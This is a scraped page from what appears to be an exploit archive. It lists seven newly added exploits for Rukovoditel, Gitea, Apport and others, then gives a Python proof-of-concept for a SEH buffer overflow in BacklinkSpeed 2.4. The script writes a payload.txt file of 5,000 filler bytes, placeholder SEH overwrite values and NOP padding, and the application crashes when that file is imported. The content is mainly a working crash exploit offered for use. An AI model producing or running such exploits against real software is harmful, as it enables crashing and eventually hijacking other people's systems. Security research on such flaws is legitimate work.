cc85c56b4c
7 changes to exploits/shellcodes BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH) Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path Apport 2.20 - Local Privilege Escalation Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated) Rukovoditel 2.6.1 - RCE Rukovoditel 2.6.1 - RCE (1) Gitea 1.12.5 - Remote Code Execution (Authenticated) Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
46 lines
No EOL
1.1 KiB
Python
Executable file
46 lines
No EOL
1.1 KiB
Python
Executable file
# Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
|
|
# Date: 2020-08-01
|
|
# Exploit Author: Saeed reza Zamanian
|
|
# Vendor Homepage: http://www.dummysoftware.com
|
|
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
|
|
# Version: 2.4
|
|
# Tested on:
|
|
Windows 10.0 x64 Build 10240
|
|
Windows 7 x64
|
|
Windows Vista x32 SP1
|
|
# Replicate Crash:
|
|
1) Install and Run the application
|
|
2) Run the exploit , the exploit create a text file named payload.txt
|
|
3) Press import button and open payload.txt
|
|
|
|
#!/usr/bin/python
|
|
'''
|
|
|
|
|----------------------------------|
|
|
| SEH chain of thread 00000350 |
|
|
| Address SE handler |
|
|
| 42424242 *** CORRUPT ENTRY *** |
|
|
| |
|
|
| EIP : 43434343 |
|
|
|----------------------------------|
|
|
'''
|
|
|
|
nSEH = "BBBB"
|
|
SEH = "CCCC"
|
|
payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH
|
|
|
|
try:
|
|
|
|
f=open("payload.txt","w")
|
|
|
|
print("[+] Creating %s bytes payload." %len(payload))
|
|
|
|
f.write(payload)
|
|
|
|
f.close()
|
|
|
|
print("[+] File created!")
|
|
|
|
except:
|
|
|
|
print("File cannot be created.") |